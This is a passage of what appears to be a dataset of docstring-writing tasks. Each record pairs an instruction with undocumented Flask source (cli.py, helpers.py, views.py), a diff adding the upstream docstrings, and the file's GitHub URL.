+ .. versionchanged:: 3.1
+ Added the ``load_defaults`` parameter. A given path takes precedence
+ over default files.
+
+ .. versionchanged:: 2.0
+ The current directory is not changed to the location of the
+ loaded file.
+
+ .. versionchanged:: 2.0
+ When loading the env files, set the default encoding to UTF-8.
+
+ .. versionchanged:: 1.1.0
+ Returns ``False`` when python-dotenv is not installed, or when
+ the given path isn't a file.
+
+ .. versionadded:: 1.0
+ """
try:
import dotenv
except ImportError:
@@ -643,6 +764,9 @@
def show_server_banner(debug: bool, app_import_path: str | None) -> None:
+ """Show extra startup messages the first time the server is run,
+ ignoring the reloader.
+ """
if is_running_from_reloader():
return
@@ -654,6 +778,10 @@
class CertParamType(click.ParamType):
+ """Click option type for the ``--cert`` option. Allows either an
+ existing file, the string ``'adhoc'``, or an import for a
+ :class:`~ssl.SSLContext` object.
+ """
name = "path"
@@ -698,6 +826,9 @@
def _validate_key(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
+ """The ``--key`` option must be specified when ``--cert`` is a file.
+ Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
+ """
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
@@ -734,6 +865,10 @@
class SeparatedPathType(click.Path):
+ """Click option type that accepts a list of values separated by the
+ OS's path separator (``:``, ``;`` on Windows). Each value is
+ validated as a :class:`click.Path` type.
+ """
def convert(
self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None
@@ -808,6 +943,14 @@ extra_files: list[str] | None,
exclude_patterns: list[str] | None,
) -> None:
+ """Run a local development server.
+
+ This server is for development purposes only. It does not provide
+ the stability, security, or performance of production WSGI servers.
+
+ The reloader and debugger are enabled by default with the '--debug'
+ option.
+ """
try:
app: WSGIApplication = info.load_app() # pyright: ignore
except Exception as e:
@@ -856,6 +999,13 @@ @click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
+ """Run an interactive Python shell in the context of a given
+ Flask application. The application will populate the default
+ namespace of this shell according to its configuration.
+
+ This is useful for executing small snippets of management code
+ without having to manually configure the application.
+ """
import code
banner = (
@@ -909,6 +1059,7 @@ @click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
+ """Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
@@ -973,4 +1124,4 @@
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/cli.py |
Include argument descriptions in docstrings | from __future__ import annotations
import importlib.util
import os
import sys
import typing as t
from datetime import datetime
from functools import cache
from functools import update_wrapper
from types import TracebackType
import werkzeug.utils
from werkzeug.exceptions import abort as _wz_abort
from werkzeug.utils import redirect as _wz_redirect
from werkzeug.wrappers import Response as BaseResponse
from .globals import _cv_app
from .globals import app_ctx
from .globals import current_app
from .globals import request
from .globals import session
from .signals import message_flashed
if t.TYPE_CHECKING: # pragma: no cover
from .wrappers import Response
def get_debug_flag() -> bool:
val = os.environ.get("FLASK_DEBUG")
return bool(val and val.lower() not in {"0", "false", "no"})
def get_load_dotenv(default: bool = True) -> bool:
val = os.environ.get("FLASK_SKIP_DOTENV")
if not val:
return default
return val.lower() in ("0", "false", "no")
@t.overload
def stream_with_context(
generator_or_function: t.Iterator[t.AnyStr],
) -> t.Iterator[t.AnyStr]: ...
@t.overload
def stream_with_context(
generator_or_function: t.Callable[..., t.Iterator[t.AnyStr]],
) -> t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]: ...
def stream_with_context(
generator_or_function: t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]],
) -> t.Iterator[t.AnyStr] | t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]:
try:
gen = iter(generator_or_function) # type: ignore[arg-type]
except TypeError:
def decorator(*args: t.Any, **kwargs: t.Any) -> t.Any:
gen = generator_or_function(*args, **kwargs) # type: ignore[operator]
return stream_with_context(gen)
return update_wrapper(decorator, generator_or_function) # type: ignore[arg-type]
def generator() -> t.Iterator[t.AnyStr]:
if (ctx := _cv_app.get(None)) is None:
raise RuntimeError(
"'stream_with_context' can only be used when a request"
" context is active, such as in a view function."
)
with ctx:
yield None # type: ignore[misc]
try:
yield from gen
finally:
# Clean up in case the user wrapped a WSGI iterator.
if hasattr(gen, "close"):
gen.close()
# Execute the generator to the sentinel value. This captures the current
# context and pushes it to preserve it. Further iteration will yield from
# the original iterator.
wrapped_g = generator()
next(wrapped_g)
return wrapped_g
def make_response(*args: t.Any) -> Response:
if not args:
return current_app.response_class()
if len(args) == 1:
args = args[0]
return current_app.make_response(args)
def url_for(
endpoint: str,
*,
_anchor: str | None = None,
_method: str | None = None,
_scheme: str | None = None,
_external: bool | None = None,
**values: t.Any,
) -> str:
return current_app.url_for(
endpoint,
_anchor=_anchor,
_method=_method,
_scheme=_scheme,
_external=_external,
**values,
)
def redirect(
location: str, code: int = 303, Response: type[BaseResponse] | None = None
) -> BaseResponse:
if (ctx := _cv_app.get(None)) is not None:
return ctx.app.redirect(location, code=code)
return _wz_redirect(location, code=code, Response=Response)
def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
if (ctx := _cv_app.get(None)) is not None:
ctx.app.aborter(code, *args, **kwargs)
_wz_abort(code, *args, **kwargs)
def get_template_attribute(template_name: str, attribute: str) -> t.Any:
return getattr(current_app.jinja_env.get_template(template_name).module, attribute)
def flash(message: str, category: str = "message") -> None:
# Original implementation:
#
# session.setdefault('_flashes', []).append((category, message))
#
# This assumed that changes made to mutable structures in the session are
# always in sync with the session object, which is not true for session
# implementations that use external storage for keeping their keys/values.
flashes = session.get("_flashes", [])
flashes.append((category, message))
session["_flashes"] = flashes
app = current_app._get_current_object()
message_flashed.send(
app,
_async_wrapper=app.ensure_sync,
message=message,
category=category,
)
def get_flashed_messages(
with_categories: bool = False, category_filter: t.Iterable[str] = ()
) -> list[str] | list[tuple[str, str]]:
flashes = app_ctx._flashes
if flashes is None:
flashes = session.pop("_flashes") if "_flashes" in session else []
app_ctx._flashes = flashes
if category_filter:
flashes = list(filter(lambda f: f[0] in category_filter, flashes))
if not with_categories:
return [x[1] for x in flashes]
return flashes
def _prepare_send_file_kwargs(**kwargs: t.Any) -> dict[str, t.Any]:
ctx = app_ctx._get_current_object()
if kwargs.get("max_age") is None:
kwargs["max_age"] = ctx.app.get_send_file_max_age
kwargs.update(
environ=ctx.request.environ,
use_x_sendfile=ctx.app.config["USE_X_SENDFILE"],
response_class=ctx.app.response_class,
_root_path=ctx.app.root_path,
)
return kwargs
def send_file(
path_or_file: os.PathLike[t.AnyStr] | str | t.IO[bytes],
mimetype: str | None = None,
as_attachment: bool = False,
download_name: str | None = None,
conditional: bool = True,
etag: bool | str = True,
last_modified: datetime | int | float | None = None,
max_age: None | (int | t.Callable[[str | None], int | None]) = None,
) -> Response:
return werkzeug.utils.send_file( # type: ignore[return-value]
**_prepare_send_file_kwargs(
path_or_file=path_or_file,
environ=request.environ,
mimetype=mimetype,
as_attachment=as_attachment,
download_name=download_name,
conditional=conditional,
etag=etag,
last_modified=last_modified,
max_age=max_age,
)
)
def send_from_directory(
directory: os.PathLike[str] | str,
path: os.PathLike[str] | str,
**kwargs: t.Any,
) -> Response:
return werkzeug.utils.send_from_directory( # type: ignore[return-value]
directory, path, **_prepare_send_file_kwargs(**kwargs)
)
def get_root_path(import_name: str) -> str:
# Module already imported and has a file attribute. Use that first.
mod = sys.modules.get(import_name)
if mod is not None and hasattr(mod, "__file__") and mod.__file__ is not None:
return os.path.dirname(os.path.abspath(mod.__file__))
# Next attempt: check the loader.
try:
spec = importlib.util.find_spec(import_name)
if spec is None:
raise ValueError
except (ImportError, ValueError):
loader = None
else:
loader = spec.loader
# Loader does not exist or we're referring to an unloaded main
# module or a main module without path (interactive sessions), go
# with the current working directory.
if loader is None:
return os.getcwd()
if hasattr(loader, "get_filename"):
filepath = loader.get_filename(import_name) # pyright: ignore
else:
# Fall back to imports.
__import__(import_name)
mod = sys.modules[import_name]
filepath = getattr(mod, "__file__", None)
# If we don't have a file path it might be because it is a
# namespace package. In this case pick the root path from the
# first module that is contained in the package.
if filepath is None:
raise RuntimeError(
"No root path can be found for the provided module"
f" {import_name!r}. This can happen because the module"
" came from an import hook that does not provide file"
" name information or because it's a namespace package."
" In this case the root path needs to be explicitly"
" provided."
)
# filepath is import_name.py for a module, or __init__.py for a package.
return os.path.dirname(os.path.abspath(filepath)) # type: ignore[no-any-return]
@cache
def _split_blueprint_path(name: str) -> list[str]:
out: list[str] = [name]
if "." in name:
out.extend(_split_blueprint_path(name.rpartition(".")[0]))
return out
class _CollectErrors:
def __init__(self) -> None:
self.errors: list[BaseException] = []
def __enter__(self) -> None:
pass
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_val: BaseException | None,
exc_tb: TracebackType | None,
) -> bool:
if exc_val is not None:
self.errors.append(exc_val)
return True
def raise_any(self, message: str) -> None:
if self.errors:
if sys.version_info >= (3, 11):
raise BaseExceptionGroup(message, self.errors) # noqa: F821
else:
raise self.errors[0] | --- +++ @@ -26,11 +26,20 @@
def get_debug_flag() -> bool:
+ """Get whether debug mode should be enabled for the app, indicated by the
+ :envvar:`FLASK_DEBUG` environment variable. The default is ``False``.
+ """
val = os.environ.get("FLASK_DEBUG")
return bool(val and val.lower() not in {"0", "false", "no"})
def get_load_dotenv(default: bool = True) -> bool:
+ """Get whether the user has disabled loading default dotenv files by
+ setting :envvar:`FLASK_SKIP_DOTENV`. The default is ``True``, load
+ the files.
+
+ :param default: What to return if the env var isn't set.
+ """
val = os.environ.get("FLASK_SKIP_DOTENV")
if not val:
@@ -54,6 +63,56 @@ def stream_with_context(
generator_or_function: t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]],
) -> t.Iterator[t.AnyStr] | t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]:
+ """Wrap a response generator function so that it runs inside the current
+ request context. This keeps :data:`.request`, :data:`.session`, and :data:`.g`
+ available, even though at the point the generator runs the request context
+ will typically have ended.
+
+ .. warning::
+
+ Due to the following caveat, it is often safer to pass the data you
+ need as arguments to the generator, rather than relying on the context
+ objects.
+
+ More headers cannot be sent after the body has begun. Therefore, you must
+ make sure all headers are set before starting the response. In particular,
+ if the generator will access ``session``, be sure to do so in the view as
+ well so that the ``Vary: cookie`` header will be set. Do not modify the
+ session in the generator, as the ``Set-Cookie`` header will already be sent.
+
+ Use it as a decorator on a generator function:
+
+ .. code-block:: python
+
+ from flask import stream_with_context, request, Response
+
+ @app.get("/stream")
+ def streamed_response():
+ @stream_with_context
+ def generate():
+ yield "Hello "
+ yield request.args["name"]
+ yield "!"
+
+ return Response(generate())
+
+ Or use it as a wrapper around a created generator:
+
+ .. code-block:: python
+
+ from flask import stream_with_context, request, Response
+
+ @app.get("/stream")
+ def streamed_response():
+ def generate():
+ yield "Hello "
+ yield request.args["name"]
+ yield "!"
+
+ return Response(stream_with_context(generate()))
+
+ .. versionadded:: 0.9
+ """
try:
gen = iter(generator_or_function) # type: ignore[arg-type]
except TypeError:
@@ -90,6 +149,47 @@
def make_response(*args: t.Any) -> Response:
+ """Sometimes it is necessary to set additional headers in a view. Because
+ views do not have to return response objects but can return a value that
+ is converted into a response object by Flask itself, it becomes tricky to
+ add headers to it. This function can be called instead of using a return
+ and you will get a response object which you can use to attach headers.
+
+ If view looked like this and you want to add a new header::
+
+ def index():
+ return render_template('index.html', foo=42)
+
+ You can now do something like this::
+
+ def index():
+ response = make_response(render_template('index.html', foo=42))
+ response.headers['X-Parachutes'] = 'parachutes are cool'
+ return response
+
+ This function accepts the very same arguments you can return from a
+ view function. This for example creates a response with a 404 error
+ code::
+
+ response = make_response(render_template('not_found.html'), 404)
+
+ The other use case of this function is to force the return value of a
+ view function into a response which is helpful with view
+ decorators::
+
+ response = make_response(view_function())
+ response.headers['X-Parachutes'] = 'parachutes are cool'
+
+ Internally this function does the following things:
+
+ - if no arguments are passed, it creates a new response argument
+ - if one argument is passed, :meth:`flask.Flask.make_response`
+ is invoked with it.
+ - if more than one argument is passed, the arguments are passed
+ to the :meth:`flask.Flask.make_response` function as tuple.
+
+ .. versionadded:: 0.6
+ """
if not args:
return current_app.response_class()
if len(args) == 1:
@@ -106,6 +206,41 @@ _external: bool | None = None,
**values: t.Any,
) -> str:
+ """Generate a URL to the given endpoint with the given values.
+
+ This requires an active request or application context, and calls
+ :meth:`current_app.url_for() <flask.Flask.url_for>`. See that method
+ for full documentation.
+
+ :param endpoint: The endpoint name associated with the URL to
+ generate. If this starts with a ``.``, the current blueprint
+ name (if any) will be used.
+ :param _anchor: If given, append this as ``#anchor`` to the URL.
+ :param _method: If given, generate the URL associated with this
+ method for the endpoint.
+ :param _scheme: If given, the URL will have this scheme if it is
+ external.
+ :param _external: If given, prefer the URL to be internal (False) or
+ require it to be external (True). External URLs include the
+ scheme and domain. When not in an active request, URLs are
+ external by default.
+ :param values: Values to use for the variable parts of the URL rule.
+ Unknown keys are appended as query string arguments, like
+ ``?a=b&c=d``.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.url_for``, allowing an app to override the
+ behavior.
+
+ .. versionchanged:: 0.10
+ The ``_scheme`` parameter was added.
+
+ .. versionchanged:: 0.9
+ The ``_anchor`` and ``_method`` parameters were added.
+
+ .. versionchanged:: 0.9
+ Calls ``app.handle_url_build_error`` on build errors.
+ """
return current_app.url_for(
endpoint,
_anchor=_anchor,
@@ -119,6 +254,24 @@ def redirect(
location: str, code: int = 303, Response: type[BaseResponse] | None = None
) -> BaseResponse:
+ """Create a redirect response object.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`~flask.Flask.redirect` method, otherwise it will use
+ :func:`werkzeug.utils.redirect`.
+
+ :param location: The URL to redirect to.
+ :param code: The status code for the redirect.
+ :param Response: The response class to use. Not used when
+ ``current_app`` is active, which uses ``app.response_class``.
+
+ .. versionchanged:: 3.2
+ ``code`` defaults to ``303`` instead of ``302``.
+
+ .. versionadded:: 2.2
+ Calls ``current_app.redirect`` if available instead of always
+ using Werkzeug's default ``redirect``.
+ """
if (ctx := _cv_app.get(None)) is not None:
return ctx.app.redirect(location, code=code)
@@ -126,6 +279,22 @@
def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
+ """Raise an :exc:`~werkzeug.exceptions.HTTPException` for the given
+ status code.
+
+ If :data:`~flask.current_app` is available, it will call its
+ :attr:`~flask.Flask.aborter` object, otherwise it will use
+ :func:`werkzeug.exceptions.abort`.
+
+ :param code: The status code for the exception, which must be
+ registered in ``app.aborter``.
+ :param args: Passed to the exception.
+ :param kwargs: Passed to the exception.
+
+ .. versionadded:: 2.2
+ Calls ``current_app.aborter`` if available instead of always
+ using Werkzeug's default ``abort``.
+ """
if (ctx := _cv_app.get(None)) is not None:
ctx.app.aborter(code, *args, **kwargs)
@@ -133,10 +302,42 @@
def get_template_attribute(template_name: str, attribute: str) -> t.Any:
+ """Loads a macro (or variable) a template exports. This can be used to
+ invoke a macro from within Python code. If you for example have a
+ template named :file:`_cider.html` with the following contents:
+
+ .. sourcecode:: html+jinja
+
+ {% macro hello(name) %}Hello {{ name }}!{% endmacro %}
+
+ You can access this from Python code like this::
+
+ hello = get_template_attribute('_cider.html', 'hello')
+ return hello('World')
+
+ .. versionadded:: 0.2
+
+ :param template_name: the name of the template
+ :param attribute: the name of the variable of macro to access
+ """
return getattr(current_app.jinja_env.get_template(template_name).module, attribute)
def flash(message: str, category: str = "message") -> None:
+ """Flashes a message to the next request. In order to remove the
+ flashed message from the session and to display it to the user,
+ the template has to call :func:`get_flashed_messages`.
+
+ .. versionchanged:: 0.3
+ `category` parameter added.
+
+ :param message: the message to be flashed.
+ :param category: the category for the message. The following values
+ are recommended: ``'message'`` for any kind of message,
+ ``'error'`` for errors, ``'info'`` for information
+ messages and ``'warning'`` for warnings. However any
+ kind of string can be used as category.
+ """
# Original implementation:
#
# session.setdefault('_flashes', []).append((category, message))
@@ -159,6 +360,34 @@ def get_flashed_messages(
with_categories: bool = False, category_filter: t.Iterable[str] = ()
) -> list[str] | list[tuple[str, str]]:
+ """Pulls all flashed messages from the session and returns them.
+ Further calls in the same request to the function will return
+ the same messages. By default just the messages are returned,
+ but when `with_categories` is set to ``True``, the return value will
+ be a list of tuples in the form ``(category, message)`` instead.
+
+ Filter the flashed messages to one or more categories by providing those
+ categories in `category_filter`. This allows rendering categories in
+ separate html blocks. The `with_categories` and `category_filter`
+ arguments are distinct:
+
+ * `with_categories` controls whether categories are returned with message
+ text (``True`` gives a tuple, where ``False`` gives just the message text).
+ * `category_filter` filters the messages down to only those matching the
+ provided categories.
+
+ See :doc:`/patterns/flashing` for examples.
+
+ .. versionchanged:: 0.3
+ `with_categories` parameter added.
+
+ .. versionchanged:: 0.9
+ `category_filter` parameter added.
+
+ :param with_categories: set to ``True`` to also receive categories.
+ :param category_filter: filter of categories to limit return values. Only
+ categories in the list will be returned.
+ """
flashes = app_ctx._flashes
if flashes is None:
flashes = session.pop("_flashes") if "_flashes" in session else []
@@ -195,6 +424,107 @@ last_modified: datetime | int | float | None = None,
max_age: None | (int | t.Callable[[str | None], int | None]) = None,
) -> Response:
+ """Send the contents of a file to the client.
+
+ The first argument can be a file path or a file-like object. Paths
+ are preferred in most cases because Werkzeug can manage the file and
+ get extra information from the path. Passing a file-like object
+ requires that the file is opened in binary mode, and is mostly
+ useful when building a file in memory with :class:`io.BytesIO`.
+
+ Never pass file paths provided by a user. The path is assumed to be
+ trusted, so a user could craft a path to access a file you didn't
+ intend. Use :func:`send_from_directory` to safely serve
+ user-requested paths from within a directory.
+
+ If the WSGI server sets a ``file_wrapper`` in ``environ``, it is
+ used, otherwise Werkzeug's built-in wrapper is used. Alternatively,
+ if the HTTP server supports ``X-Sendfile``, configuring Flask with
+ ``USE_X_SENDFILE = True`` will tell the server to send the given
+ path, which is much more efficient than reading it in Python.
+
+ :param path_or_file: The path to the file to send, relative to the
+ current working directory if a relative path is given.
+ Alternatively, a file-like object opened in binary mode. Make
+ sure the file pointer is seeked to the start of the data.
+ :param mimetype: The MIME type to send for the file. If not
+ provided, it will try to detect it from the file name.
+ :param as_attachment: Indicate to a browser that it should offer to
+ save the file instead of displaying it.
+ :param download_name: The default name browsers will use when saving
+ the file. Defaults to the passed file name.
+ :param conditional: Enable conditional and range responses based on
+ request headers. Requires passing a file path and ``environ``.
+ :param etag: Calculate an ETag for the file, which requires passing
+ a file path. Can also be a string to use instead.
+ :param last_modified: The last modified time to send for the file,
+ in seconds. If not provided, it will try to detect it from the
+ file path.
+ :param max_age: How long the client should cache the file, in
+ seconds. If set, ``Cache-Control`` will be ``public``, otherwise
+ it will be ``no-cache`` to prefer conditional caching.
+
+ .. versionchanged:: 2.0
+ ``download_name`` replaces the ``attachment_filename``
+ parameter. If ``as_attachment=False``, it is passed with
+ ``Content-Disposition: inline`` instead.
+
+ .. versionchanged:: 2.0
+ ``max_age`` replaces the ``cache_timeout`` parameter.
+ ``conditional`` is enabled and ``max_age`` is not set by
+ default.
+
+ .. versionchanged:: 2.0
+ ``etag`` replaces the ``add_etags`` parameter. It can be a
+ string to use instead of generating one.
+
+ .. versionchanged:: 2.0
+ Passing a file-like object that inherits from
+ :class:`~io.TextIOBase` will raise a :exc:`ValueError` rather
+ than sending an empty file.
+
+ .. versionadded:: 2.0
+ Moved the implementation to Werkzeug. This is now a wrapper to
+ pass some Flask-specific arguments.
+
+ .. versionchanged:: 1.1
+ ``filename`` may be a :class:`~os.PathLike` object.
+
+ .. versionchanged:: 1.1
+ Passing a :class:`~io.BytesIO` object supports range requests.
+
+ .. versionchanged:: 1.0.3
+ Filenames are encoded with ASCII instead of Latin-1 for broader
+ compatibility with WSGI servers.
+
+ .. versionchanged:: 1.0
+ UTF-8 filenames as specified in :rfc:`2231` are supported.
+
+ .. versionchanged:: 0.12
+ The filename is no longer automatically inferred from file
+ objects. If you want to use automatic MIME and etag support,
+ pass a filename via ``filename_or_fp`` or
+ ``attachment_filename``.
+
+ .. versionchanged:: 0.12
+ ``attachment_filename`` is preferred over ``filename`` for MIME
+ detection.
+
+ .. versionchanged:: 0.9
+ ``cache_timeout`` defaults to
+ :meth:`Flask.get_send_file_max_age`.
+
+ .. versionchanged:: 0.7
+ MIME guessing and etag support for file-like objects was
+ removed because it was unreliable. Pass a filename if you are
+ able to, otherwise attach an etag yourself.
+
+ .. versionchanged:: 0.5
+ The ``add_etags``, ``cache_timeout`` and ``conditional``
+ parameters were added. The default behavior is to add etags.
+
+ .. versionadded:: 0.2
+ """
return werkzeug.utils.send_file( # type: ignore[return-value]
**_prepare_send_file_kwargs(
path_or_file=path_or_file,
@@ -215,12 +545,54 @@ path: os.PathLike[str] | str,
**kwargs: t.Any,
) -> Response:
+ """Send a file from within a directory using :func:`send_file`.
+
+ .. code-block:: python
+
+ @app.route("/uploads/<path:name>")
+ def download_file(name):
+ return send_from_directory(
+ app.config['UPLOAD_FOLDER'], name, as_attachment=True
+ )
+
+ This is a secure way to serve files from a folder, such as static
+ files or uploads. Uses :func:`~werkzeug.security.safe_join` to
+ ensure the path coming from the client is not maliciously crafted to
+ point outside the specified directory.
+
+ If the final path does not point to an existing regular file,
+ raises a 404 :exc:`~werkzeug.exceptions.NotFound` error.
+
+ :param directory: The directory that ``path`` must be located under,
+ relative to the current application's root path. This *must not*
+ be a value provided by the client, otherwise it becomes insecure.
+ :param path: The path to the file to send, relative to
+ ``directory``.
+ :param kwargs: Arguments to pass to :func:`send_file`.
+
+ .. versionchanged:: 2.0
+ ``path`` replaces the ``filename`` parameter.
+
+ .. versionadded:: 2.0
+ Moved the implementation to Werkzeug. This is now a wrapper to
+ pass some Flask-specific arguments.
+
+ .. versionadded:: 0.5
+ """
return werkzeug.utils.send_from_directory( # type: ignore[return-value]
directory, path, **_prepare_send_file_kwargs(**kwargs)
)
def get_root_path(import_name: str) -> str:
+ """Find the root path of a package, or the path that contains a
+ module. If it cannot be found, returns the current working
+ directory.
+
+ Not to be confused with the value returned by :func:`find_package`.
+
+ :meta private:
+ """
# Module already imported and has a file attribute. Use that first.
mod = sys.modules.get(import_name)
@@ -280,6 +652,9 @@
class _CollectErrors:
+ """A context manager that records and silences an error raised within it.
+ Used to run all teardown functions, then raise any errors afterward.
+ """
def __init__(self) -> None:
self.errors: list[BaseException] = []
@@ -299,8 +674,9 @@ return True
def raise_any(self, message: str) -> None:
+ """Raise if any errors were collected."""
if self.errors:
if sys.version_info >= (3, 11):
raise BaseExceptionGroup(message, self.errors) # noqa: F821
else:
- raise self.errors[0]+ raise self.errors[0]
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/helpers.py |
Fully document this Python code with docstrings | from __future__ import annotations
import typing as t
from . import typing as ft
from .globals import current_app
from .globals import request
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
http_method_funcs = frozenset(
["get", "post", "head", "options", "delete", "put", "trace", "patch"]
)
class View:
#: The methods this view is registered for. Uses the same default
#: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and
#: ``add_url_rule`` by default.
methods: t.ClassVar[t.Collection[str] | None] = None
#: Control whether the ``OPTIONS`` method is handled automatically.
#: Uses the same default (``True``) as ``route`` and
#: ``add_url_rule`` by default.
provide_automatic_options: t.ClassVar[bool | None] = None
#: A list of decorators to apply, in order, to the generated view
#: function. Remember that ``@decorator`` syntax is applied bottom
#: to top, so the first decorator in the list would be the bottom
#: decorator.
#:
#: .. versionadded:: 0.8
decorators: t.ClassVar[list[t.Callable[..., t.Any]]] = []
#: Create a new instance of this view class for every request by
#: default. If a view subclass sets this to ``False``, the same
#: instance is used for every request.
#:
#: A single instance is more efficient, especially if complex setup
#: is done during init. However, storing data on ``self`` is no
#: longer safe across requests, and :data:`~flask.g` should be used
#: instead.
#:
#: .. versionadded:: 2.2
init_every_request: t.ClassVar[bool] = True
def dispatch_request(self) -> ft.ResponseReturnValue:
raise NotImplementedError()
@classmethod
def as_view(
cls, name: str, *class_args: t.Any, **class_kwargs: t.Any
) -> ft.RouteCallable:
if cls.init_every_request:
def view(**kwargs: t.Any) -> ft.ResponseReturnValue:
self = view.view_class( # type: ignore[attr-defined]
*class_args, **class_kwargs
)
return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return]
else:
self = cls(*class_args, **class_kwargs) # pyright: ignore
def view(**kwargs: t.Any) -> ft.ResponseReturnValue:
return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return]
if cls.decorators:
view.__name__ = name
view.__module__ = cls.__module__
for decorator in cls.decorators:
view = decorator(view)
# We attach the view class to the view function for two reasons:
# first of all it allows us to easily figure out what class-based
# view this thing came from, secondly it's also used for instantiating
# the view class so you can actually replace it with something else
# for testing purposes and debugging.
view.view_class = cls # type: ignore
view.__name__ = name
view.__doc__ = cls.__doc__
view.__module__ = cls.__module__
view.methods = cls.methods # type: ignore
view.provide_automatic_options = cls.provide_automatic_options # type: ignore
return view
class MethodView(View):
def __init_subclass__(cls, **kwargs: t.Any) -> None:
super().__init_subclass__(**kwargs)
if "methods" not in cls.__dict__:
methods = set()
for base in cls.__bases__:
if getattr(base, "methods", None):
methods.update(base.methods) # type: ignore[attr-defined]
for key in http_method_funcs:
if hasattr(cls, key):
methods.add(key.upper())
if methods:
cls.methods = methods
def dispatch_request(self, **kwargs: t.Any) -> ft.ResponseReturnValue:
meth = getattr(self, request.method.lower(), None)
# If the request method is HEAD and we don't have a handler for it
# retry with GET.
if meth is None and request.method == "HEAD":
meth = getattr(self, "get", None)
assert meth is not None, f"Unimplemented method {request.method!r}"
return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return] | --- +++ @@ -14,6 +14,36 @@
class View:
+ """Subclass this class and override :meth:`dispatch_request` to
+ create a generic class-based view. Call :meth:`as_view` to create a
+ view function that creates an instance of the class with the given
+ arguments and calls its ``dispatch_request`` method with any URL
+ variables.
+
+ See :doc:`views` for a detailed guide.
+
+ .. code-block:: python
+
+ class Hello(View):
+ init_every_request = False
+
+ def dispatch_request(self, name):
+ return f"Hello, {name}!"
+
+ app.add_url_rule(
+ "/hello/<name>", view_func=Hello.as_view("hello")
+ )
+
+ Set :attr:`methods` on the class to change what methods the view
+ accepts.
+
+ Set :attr:`decorators` on the class to apply a list of decorators to
+ the generated view function. Decorators applied to the class itself
+ will not be applied to the generated view function!
+
+ Set :attr:`init_every_request` to ``False`` for efficiency, unless
+ you need to store request-global data on ``self``.
+ """
#: The methods this view is registered for. Uses the same default
#: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and
@@ -46,12 +76,31 @@ init_every_request: t.ClassVar[bool] = True
def dispatch_request(self) -> ft.ResponseReturnValue:
+ """The actual view function behavior. Subclasses must override
+ this and return a valid response. Any variables from the URL
+ rule are passed as keyword arguments.
+ """
raise NotImplementedError()
@classmethod
def as_view(
cls, name: str, *class_args: t.Any, **class_kwargs: t.Any
) -> ft.RouteCallable:
+ """Convert the class into a view function that can be registered
+ for a route.
+
+ By default, the generated view will create a new instance of the
+ view class for every request and call its
+ :meth:`dispatch_request` method. If the view class sets
+ :attr:`init_every_request` to ``False``, the same instance will
+ be used for every request.
+
+ Except for ``name``, all other arguments passed to this method
+ are forwarded to the view class ``__init__`` method.
+
+ .. versionchanged:: 2.2
+ Added the ``init_every_request`` class attribute.
+ """
if cls.init_every_request:
def view(**kwargs: t.Any) -> ft.ResponseReturnValue:
@@ -87,6 +136,31 @@
class MethodView(View):
+ """Dispatches request methods to the corresponding instance methods.
+ For example, if you implement a ``get`` method, it will be used to
+ handle ``GET`` requests.
+
+ This can be useful for defining a REST API.
+
+ :attr:`methods` is automatically set based on the methods defined on
+ the class.
+
+ See :doc:`views` for a detailed guide.
+
+ .. code-block:: python
+
+ class CounterAPI(MethodView):
+ def get(self):
+ return str(session.get("counter", 0))
+
+ def post(self):
+ session["counter"] = session.get("counter", 0) + 1
+ return redirect(url_for("counter"))
+
+ app.add_url_rule(
+ "/counter", view_func=CounterAPI.as_view("counter")
+ )
+ """
def __init_subclass__(cls, **kwargs: t.Any) -> None:
super().__init_subclass__(**kwargs)
@@ -114,4 +188,4 @@ meth = getattr(self, "get", None)
assert meth is not None, f"Unimplemented method {request.method!r}"
- return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return]+ return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return]
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/views.py |
Can you add docstrings to this Python file? | from __future__ import annotations
import importlib.util
import os
import pathlib
import sys
import typing as t
from collections import defaultdict
from functools import update_wrapper
from jinja2 import BaseLoader
from jinja2 import FileSystemLoader
from werkzeug.exceptions import default_exceptions
from werkzeug.exceptions import HTTPException
from werkzeug.utils import cached_property
from .. import typing as ft
from ..helpers import get_root_path
from ..templating import _default_template_ctx_processor
if t.TYPE_CHECKING: # pragma: no cover
from click import Group
# a singleton sentinel value for parameter defaults
_sentinel = object()
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any])
T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable)
T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_context_processor = t.TypeVar(
"T_template_context_processor", bound=ft.TemplateContextProcessorCallable
)
T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable)
T_url_value_preprocessor = t.TypeVar(
